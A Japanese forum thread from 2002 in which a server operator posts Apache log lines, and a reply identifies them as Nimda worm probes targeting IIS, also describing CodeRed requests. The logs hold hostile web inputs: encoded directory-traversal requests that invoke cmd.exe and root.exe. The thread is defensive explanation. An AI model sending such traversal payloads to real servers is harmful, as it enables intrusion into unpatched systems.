ようやく、公開できたのですが、このほど、Apacheのログに意味不明なログがたくさんあるので何なのか分かったらでいいので教えてください。IPアドレスは伏せておきますが、
[17/Aug/2002:12:56:26 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:12:56:27 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:29 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:12:56:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
[17/Aug/2002:12:56:25 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
[17/Aug/2002:12:56:25 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:12:56:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:12:56:26 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:12:56:26 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:12:56:26 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
[17/Aug/2002:12:56:27 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:27 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
[17/Aug/2002:12:56:28 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:14:43:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
[17/Aug/2002:14:43:18 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
[17/Aug/2002:14:43:18 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:14:43:18 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
[17/Aug/2002:14:43:18 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[17/Aug/2002:14:43:18 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:14:43:19 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
[17/Aug/2002:14:43:19 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
このようなログがたくさん並んでいます。
これは、一部です。
これは何なのでしょうか?
> ようやく、公開できたのですが、このほど、Apacheのログに意味不明なログがたくさんあるので何なのか分かったらでいいので教えてください。IPアドレスは伏せておきますが、
> [17/Aug/2002:12:56:26 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
鷹の巣さんの掲示板でも同様の質問があり、回答していますが、これがかの有名なIISに取りつく
ウイルスNimdaです。Apacheにとっては、単なるゴミアクセスですので心配ありません。
もうひとつ、そのうちくるでしょうが、CodeRedがありますが、これは、
GET /default.ida?NNNNNNNNN・・・・・
と非常にたくさんの「N」又は「?」の連続したアクセスです。最近は、CodeRedはあまりこないと
鷹の巣さんの掲示板には書いたのですが、その後、なぜか結構くるようになりました。これも、
Apacheにとっては単なるゴミアクセスですから心配はありません。
ただ、ログが汚れてウザイなら、おやじのWWWサーバ(Linux版)のページに他のファイルにログ
ったり、ログらない方法がありますので、参考にしてください。ただ、CodeRedはパターンマッチ
がうまくいかずに引っ掛けられません。1発なのと少ないのであきらめています。
ありがとうございます!
ずっと疑問に思っていたログが悪影響を及ぼすものでないと分かってほっとしています。
ちなみに、IISに取りつくウイルスNimdaの数は1日十数回あるのですが、CodeRedも1日数回あります。
どうもありがとうございました。